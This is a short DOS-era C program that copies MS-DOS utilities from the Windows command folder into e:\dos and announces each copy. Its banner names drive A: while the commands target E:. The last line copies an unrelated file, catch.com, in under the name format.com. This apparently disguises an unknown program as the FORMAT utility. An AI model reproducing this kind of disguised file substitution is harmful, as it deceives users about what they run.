#include<stdio.h>
#include<stdlib.h>
#include <dos.h>
#include<conio.h>
#include<process.h>
void main (void)
{
	clrscr();
	printf("\n\t\aAnshuman & Sandip are now..... Loading Dos files onto drive A:\n");
	system("md e:\\dos");
	printf("\n") ;
	system("copy  c:\\windows\\command\\TREE.EXE e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Tree.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\COMMAND.COM  e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Command.com has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\DELTREE.EXE  e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Deltree.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\CHKDSK.EXE   e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Chkdsk.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\ATTRIB.EXE   e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Attrib.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\DISKCOPY.COM e:\\dos");
	gotoxy(1, wherey()-1) ;
	printf("Anshuman & Sandip say  Diskcopy.com has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\DISKCOPY.EXE e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Diskcopy.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\DOSKEY.COM   e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Doskey.com has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\DISKCOMP.EXE e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Diskcomp.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\EDIT.COM     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Edit.com has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\MODE.COM     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Mode.com has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\MORE.EXE     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  More.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\MORE.COM     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  More.com has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\MODE.EXE     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Mode.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\SYS.COM      e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Sys.com has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\SORT.EXE     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Sort.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\FIND.EXE     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Find.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\MEM.EXE      e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Mem.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\UNDELETE.EXE e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Undelete.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\TREE.COM     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Tree.com has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\DOSKEY.EXE   e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Doskey.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\MOVE.EXE     e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Move.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\QBASIC.EXE   e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Qbasic.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\QBASIC.INI   e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Qbasic.ini has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\EDLIN.EXE    e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Edlin.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\XCOPY.EXE    e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Xcopy.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\windows\\command\\LABEL.EXE    e:\\dos");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Label.exe has been loaded") ;
	printf("\n") ;
	system("copy  c:\\dos\\catch.com e:\\dos\\format.com");
	gotoxy(1, wherey() - 1) ;
	printf("Anshuman & Sandip say  Format.com has been loaded! be careful.") ;
	printf("\n\t\a\t\a\t\a.............Loading has Completed.");
}